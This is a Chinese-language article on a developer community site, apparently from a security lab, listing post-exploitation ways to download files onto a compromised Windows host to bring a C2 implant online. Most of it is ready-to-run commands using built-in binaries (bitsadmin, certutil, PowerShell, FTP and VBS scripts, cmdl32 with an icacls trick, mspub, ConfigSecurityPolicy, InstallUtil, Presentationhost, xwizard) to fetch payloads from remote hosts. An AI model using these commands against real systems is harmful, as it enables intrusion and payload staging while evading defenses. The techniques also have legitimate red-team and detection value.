AI 助理
备案控制台
开发者社区 开发与运维 文章 正文

后渗透之windows中远程下载文件tips

2023-05-21 1741
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 后渗透之windows中远程下载文件tips

前言


我们在渗透过程中,当获取到一个shell能够执行命令的同时,想要上线c2,就要先将文件传输到目标,并用到一些命令行中的下载命令如BITSAdmin、Certutil、 powershell、HH等。

本文将列举一部分文件落地的下载方式。无文件落地不在本篇范围内



下载命令


Bitsadmin


BITSAdmin 是一个命令行工具,可用于创建下载或上传作业并监视作业的进度。

文件路径:
C:\Windos\System32\Bitsadmin.exe

支持系统:

WindowsServer 2022、WindowsServer 2019、Windows Server 2016、Windows Server 2012、Windows 10、Windows7

用法:

bitsadmin /transfer myDownLoadJob /download /priority normal "http://url/a.ps1" "c:\b.ps1"
bitsadmin /rawreturn /transfer getfile http://url/s.zip c:\s1.zip
bitsadmin /rawreturn /transfer getpayload http://url/c.zip c:\c1.zip


Certutil


certutil是Windows自带的证书管理工具,具有下载文件,校验文件MD5、SHA1、SHA256,文件base64编码等功能。

文件路径:

C:\Windows\System32\Certutil.exe

支持系统: windows

用法:

#保存文件并指定新文件名
certutil.exe -urlcache -split -f http://url/1.txt file.jsp
注:使用下载,会在工具缓存目录产生缓存文件
#缓存路径
C:\Users\xq\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
#查看缓存项目:
certutil.exe -urlcache *


powershell


自win7/win 2008开始,win系统增加了powershell工具。
PowerShell是一种命令行外壳程序和脚本环境

文件路径:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

支持系统: win7/win2008 =<

用法:

powershell (new-objectNet.WebClient).DownloadFile('http://url/aa.ps1','c:\bb.ps1')


FTP


将文件传输到运行文件传输协议的计算机 (ftp) 服务器服务。可以通过处理 ASCII 文本文件以交互方式或在批处理模式下使用此命令。

文件路径:

支持系统: windows

用法:

cmd无交互


echo open 192.168.225.79>ftp.txt
echo user>>ftp.txt
echo pass>>ftp.txt
echo get /sd.exe>>ftp.txt
echo quit>>ftp.txt
@ftp -s:ftp.txtVBS脚本

f77d74592072bb0ac9f21d738ca3304e_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


cscript


在windows中还支持一种VBS后缀脚本语言,可看作VB语言的简化版
文件路径:
C:\Windows\System32

支持系统: windows

用法:
cmd无交互


echo Set Post = CreateObject("Msxml2.XMLHTTP") >> download.vbs
echo Set Shell = CreateObject("Wscript.Shell") >> download.vbs
echo Post.Open "GET","http://192.168.203.140/a.ps1",0 >> download.vbs
echo Post.Send() >>download.vbs
echo Set aGet = CreateObject("ADODB.Stream") >> download.vbs
echo aGet.Mode = 3 >> download.vbs
echo aGet.Type = 1 >> download.vbs
echo aGet.Open() >> download.vbs
echo aGet.Write(Post.responseBody) >> download.vbs
echo aGet.SaveToFile "D:/a.ps1",2 >> download.vbs
#执行
cscript downfile.vbs

省略······
除了上述这些经典的方法,我还总结了一些tips


cmdl32


Microsoft 连接管理器自动下载。

文件路径:

  • C:\Windows\System32\cmdl32.exe
  • C:\Windows\SysWOW64\cmdl32.exe

支持系统:

WindowsVista、Windows7、Windows8、Windows8.1、Windows10、Windows11

从配置文件中指定的网址下载文件。下载的文件将位于名称 VPNXXXX.tmp 下的 %TMP% 中

用法:
创建文本 1.txt

[Connection Manager]
CMSFile=1.txt
ServiceName=WindowsUpdate
TunnelFile=1.txt
[Settings]
UpdateUrl=http://192.168.3.114:81/test.txt
#赋予权限,设置缓存位置,并下载
icacls %cd% /deny %Username%:(OI)(CI)(DE,DC)
set tmp=%cd%
cmdl32 /vpn /lan %cd%\1.txt
#删除权限,否则无法操作文件
icacls %cd% /remove:d %username%



Mspub.exe

mspub.exe是属于Microsoft Publisher产品的主要流程,允许制作商业和个人时事通讯和出版物。包含在office套件中。
文件路径:
C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSPUB.exe
C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSPUB.exe
C:\Program Files (x86)\Microsoft Office\Office16\MSPUB.exe
C:\Program Files\Microsoft Office\Office16\MSPUB.exe
C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\MSPUB.exe
C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\MSPUB.exe
C:\Program Files (x86)\Microsoft Office\Office15\MSPUB.exe
C:\Program Files\Microsoft Office\Office15\MSPUB.exe
C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\MSPUB.exe
C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\MSPUB.exe
C:\Program Files (x86)\Microsoft Office\Office14\MSPUB.exe
C:\Program Files\Microsoft Office\Office14\MSPUB.exe

支持系统:

Windows 10、Windows 11

该命令将下载远程文件并放入缓存文件夹


%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE

用法:

该方法依赖offce套件,执行后将会打开publisher应用窗口。

从远程服务器下载负载


mspub.exe https://example.com/aaaa

8a8ba3b34cabc5fd01d050dd8dbb1104_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

b2066ff36f9a8854ddef80df84ef83d0_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png



ConfigSecurityPolicy.exe


Defender文件,用于管理Windows Defender中的设置。

文件路径:

C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe

支持系统: Windows 10、Windows 11

用法:

该命令将下载远程文件并放入缓存文件夹 win10:

%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE


ConfigSecurityPolicy.exe https://example.com/aaaa


4fc733bc98aa1a6561caf5f62c9df411_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


Installutil


是一个命令行实用程序,允许通过在指定程序集中执行安装程序组件来安装和卸载。此工具与System.Configuration.Install命名空间中的类一起工作。
文件路径:

C:\Windows\Microsoft.NET\Framework\v\InstallUtil.exe 
C:\Windows\Microsoft.NET\Framework64\v\InstallUtil.exe

支持系统:

Windows vista、Windows 7、Windows 8、Windows 8.1、Windows 10、Windows 11

用法:

该命令将下载远程文件并放入缓存文件夹

win10:


%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)

win7:


%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files

InstallUtil.exe https://www.baidu.com/img/flexible/logo/pc/result.png

aa376687c3370d82d9f3aafc9ebd8253_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


Presentationhost.exe


它使 WPF 应用程序可承载于兼容的浏览器,用于运行XAML浏览器应用程序 .
文件路径:

  • C:\Windows\System32\Presentationhost.exe
  • C:\Windows\SysWOW64\Presentationhost.exe

支持系统:
Windows vista、Windows 7、Windows 8、Windows 8.1、Windows 10、Windows 11

用法:

该方法是调用IE浏览器下载,会弹出ie窗口及文件保存窗口,此时无需保存,文件已存在缓存目录内

该命令将下载远程文件并放入缓存文件夹win10:


%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE

win7:


%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files

Presentationhost.exe https://www.baidu.com/img/flexible/logo/pc/result.png

8f0583b3c127153758b8212fb1585975_640_wx_fmt=jpeg&wxfrom=5&wx_lazy=1&wx_co=1.jpg


Xwizard.exe


执行已添加到注册表的自定义类或使用Xwizard.exe下载

文件路径:

  • C:\Windows\System32\xwizard.exe
  • C:\Windows\SysWOW64\xwizard.exe

支持系统:

Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11

用法:

使用该方法时,会弹出错误警告窗口。但文件已经存入ie缓存目录

Xwizard.exe使用RemoteApp和桌面连接向导下载文件,并将其保存到


%LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>


%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files


xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /z 
https://www.baidu.com/img/flexible/logo/pc/result.png


其他


这里只总结了一小部分方法,除此之外还有很多能够用来远程下载文件的系统应用。

欢迎一起交流想法,

下期文章你想看什么?留言告诉我们!!

文章标签:
C#
Shell
Windows
缓存
关键词:
Windows下载
Windows文件
Windows下载文件
渗透Windows文件
渗透Windows
雷石安全实验室
目录
相关文章
sysin
|
26天前
|
安全 Unix 虚拟化
Windows 7 & Windows Server 2008 R2 简体中文版下载 (2025 年 2 月更新)
Windows 7 & Windows Server 2008 R2 简体中文版下载 (2025 年 2 月更新)
sysin
49 11
Windows 7 & Windows Server 2008 R2 简体中文版下载 (2025 年 2 月更新)
sysin
|
26天前
|
Unix 虚拟化 Windows
Windows Server 2025 中文版、英文版下载 (2025 年 2 月更新)
Windows Server 2025 中文版、英文版下载 (2025 年 2 月更新)
sysin
69 7
Windows Server 2025 中文版、英文版下载 (2025 年 2 月更新)
sysin
|
26天前
|
虚拟化 Windows
Windows 11 24H2 中文版、英文版 (x64、ARM64) 下载 (2025 年 2 月更新)
Windows 11 24H2 中文版、英文版 (x64、ARM64) 下载 (2025 年 2 月更新)
sysin
38 4
Windows 11 24H2 中文版、英文版 (x64、ARM64) 下载 (2025 年 2 月更新)
sysin
|
26天前
|
物联网 虚拟化 Windows
Windows 10 version 22H2 中文版、英文版下载 (2025 年 2 月更新)
Windows 10 version 22H2 中文版、英文版下载 (2025 年 2 月更新)
sysin
73 4
Windows 10 version 22H2 中文版、英文版下载 (2025 年 2 月更新)
dream_ready
|
5月前
|
NoSQL Redis 数据安全/隐私保护
Redis 最流行的图形化界面下载及使用超详细教程(带安装包)! redis windows客户端下载
文章提供了Redis最流行的图形化界面工具Another Redis Desktop Manager的下载及使用教程,包括如何下载、解压、连接Redis服务器以及使用控制台和查看数据类型详细信息。
dream_ready
527 6
Redis 最流行的图形化界面下载及使用超详细教程(带安装包)! redis windows客户端下载
sysin
|
26天前
|
安全 虚拟化 Windows
Windows Server 2019 中文版、英文版下载 (2025 年 2 月更新)
Windows Server 2019 中文版、英文版下载 (2025 年 2 月更新)
sysin
63 22
1678841753238844
|
12天前
|
固态存储 C++ 计算机视觉
Windows平台GIMP 2.10下载教程:零基础入门高级图像编辑
GIMP(GNU Image Manipulation Program)是一款开源跨平台图像编辑工具,支持图层管理、高级修图、色彩校正等功能,广泛应用于平面设计和照片修复。其优势包括全功能免费、插件生态丰富(600+扩展插件)、硬件要求低(1GB内存即可流畅运行)。本文详细介绍GIMP的软件定位、安装流程、首次配置及常见问题解答,帮助用户快速上手并充分利用其强大功能。
1678841753238844
46 2
1678841753238844
|
13天前
|
安全 固态存储 文件存储
Windows 7纯净版重装教程|附微软原版镜像下载+驱动安装避坑技巧
本文详细介绍如何安全、高效地重装电脑系统,解决蓝屏、崩溃等问题。基于10年经验,涵盖从官方镜像获取、启动盘制作、数据备份到系统部署的全流程,并针对老旧机型优化。提供驱动一键安装工具和系统激活指南,确保无后门风险。文中还列出常见问题解决方案及操作禁忌,帮助用户顺利完成系统重装,让电脑重获新生。建议收藏并转发给有需要的朋友,欢迎留言咨询疑难问题。
1678841753238844
78 2
卷福同学
|
13天前
|
安全 Windows
最新Typora1.9.5破解版下载与使用教程(Windows+Mac)
Typora是一款Markdown编辑器和阅读器。下载地址:[夸克网盘](https://pan.quark.cn/s/9d9d668fb859)。Windows版需替换`app.asart`文件并输入序列号激活;Mac版安装简单,下载后按提示操作,允许任何来源即可。具体步骤见文中图片说明。
卷福同学
78 1
1678841753238844
|
13天前
|
人工智能 测试技术 API
Windows用户必备:Postman v11详细安装指南与API测试入门教程(附官网下载
Postman是全球领先的API开发与测试工具,支持REST、SOAP、GraphQL等协议调试。2025年最新版v11新增AI智能生成测试用例、多环境变量同步等功能,适用于前后端分离开发、自动化测试、接口文档自动生成及团队协作共享API资源。本文详细介绍Postman的软件定位、核心功能、安装步骤、首次配置、基础使用及常见问题解答,帮助用户快速上手并高效利用该工具进行API开发与测试。
1678841753238844
87 1

热门文章

最新文章

  • 1
    Docker Desktop 4.38 安装与配置全流程指南(Windows平台)
  • 2
    Cyber Triage 3.13 for Windows - 数字取证和事件响应
  • 3
    Windows下CUDA+pytorch安装
  • 4
    Windows用户必备:Postman v11详细安装指南与API测试入门教程(附官网下载
  • 5
    Windows 7纯净版重装教程|附微软原版镜像下载+驱动安装避坑技巧
  • 6
    Windows 10 version 22H2 中文版、英文版下载 (2025 年 2 月更新)
  • 7
    最新Typora1.9.5破解版下载与使用教程(Windows+Mac)
  • 8
    微软工程师偷偷在用!这款SSH工具让Windows操控CentOS比Mac还优雅!
  • 9
    Windows Server 2019 中文版、英文版下载 (2025 年 2 月更新)
  • 10
    Windows Server 2025 中文版、英文版下载 (2025 年 2 月更新)
  • 1
    Windows服务器的最佳数据库是什么?
    138
  • 2
    Windows和Linux的最佳Web服务器
    93
  • 3
    阿里云云效产品使用合集之如何部署到阿里云服务器上的 Windows Server 上的 IIS
    187
  • 4
    阿里云云效产品使用合集之如何将流水线部署到Windows
    176
  • 5
    谷歌、Anthropic推出创新神经压缩Equal-Info Windows
    46
  • 6
    实时计算 Flink版产品使用问题之如何在Windows上运行
    251
  • 7
    怎么关闭Windows安全中心?
    512
  • 8
    Microsoft Windows远程桌面服务远程执行代码漏洞(CVE-2019-0708)
    183
  • 9
    Windows 32 汇编笔记(一):基础知识
    113
  • 10
    在 Windows 平台搭建 MQTT 服务
    185

    • 相关电子书

    更多
  • 《云服务器运维之Windows篇》
  • TAKING WINDOWS 10 KERNEL
  • ECS运维指南之Windows系统诊断

    • 相关实验场景

    更多
  • 快速配置Windows云服务器
  • 手动搭建FTP站点(Windows)
  • 远程桌面环境使用指南
    • 下一篇
    获取百炼API-KEY